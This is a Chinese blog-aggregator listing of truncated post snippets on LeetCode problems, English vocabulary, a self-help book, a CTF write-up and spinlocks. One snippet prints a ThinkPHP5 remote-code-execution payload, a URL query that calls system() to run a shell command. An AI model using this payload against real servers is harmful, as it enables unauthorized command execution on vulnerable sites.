链接:https://leetcode cn.com/problems/yuan quan zhong zui hou sheng xia de shu zi lcof/ 代码 ...
分类:
其他好文 时间:
2020-03-14 14:51:36
阅读次数:
35
Can you think of more directions ? 1.go straight 直走 2.turn right 向右转 3.turn left 向左转 4.go past 经过 cross 穿过 5.traffic lights 交通灯 6. sidewalk 人行道 zebra ...
分类:
其他好文 时间:
2020-03-14 10:36:43
阅读次数:
46
1.thinkphp5 rce漏洞,构造payload, ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27 ...
分类:
Web程序 时间:
2020-03-12 14:18:31
阅读次数:
97
ylbtech-图书-心理学:《思考致富》 《思考致富》是美国成功学家、作家拿破仑·希尔创作的人格心理学著作。 该作在作者20多年的亲身采访中逐渐完成,以其准确精炼的语言揭示了成功的秘密并提出了13个步骤,全球销量已超过7000万本。 1.返回顶部 1、 作品名称:思考致富外文名称:think an ...
分类:
其他好文 时间:
2020-03-12 10:09:14
阅读次数:
58
You are given two integers nn and dd . You need to construct a rooted binary tree consisting of nn vertices with a root at the vertex 11 and the sum o ...
分类:
其他好文 时间:
2020-03-09 10:32:58
阅读次数:
52
What are Jiajie Pan's top strengths? What is one thing Jiajie Pan currently does as your manager that you'd like Jiajie Pan to continue to do? What is ...
分类:
其他好文 时间:
2020-03-09 01:22:48
阅读次数:
70
居然能苟进决赛 绝了 Misc Good Video 题目: Need a video to fresh your mind? 终于又见到misc了 先binwalk扫了一遍压缩包和视频文件,得到了一大堆东西。。。。。 (居然还有vmdk?) 查了一下头部的EBML文件格式,发现这是一种面向未来的音 ...
分类:
其他好文 时间:
2020-03-08 09:47:15
阅读次数:
89
"题目" DP 险过。 dp[i][j] :means it need remove at least dp[i][j] characters to get vaild parenthese from position i to postion j in string. vector str[i][ ...
分类:
其他好文 时间:
2020-03-07 12:52:52
阅读次数:
52
Last Modified: 2020 年 03 月 06 日 虽然讲烂了, 但我发现我本人并没有导致很严格的去遵守, 所以导致目前我的穷困潦倒, 如果你有缘看到, 不妨当成镜子照一照自己, 正所谓 "夫以铜为镜, 可以正衣冠; 以史为镜, 可以知兴替; 以人为镜, 可以明得失." 时间 健康 成本 ...
分类:
其他好文 时间:
2020-03-06 10:42:43
阅读次数:
65
摘自:https://www.jianshu.com/p/f0d6e7103d9b spinlock用在什么场景? 自旋锁用在临界区代码非常少的情况。 spinlock在使用时有什么注意事项? 临界区代码应该尽可能精简 不允许睡眠(会出现死锁) Need to have interrupts dis ...
分类:
系统相关 时间:
2020-03-03 22:35:00
阅读次数:
119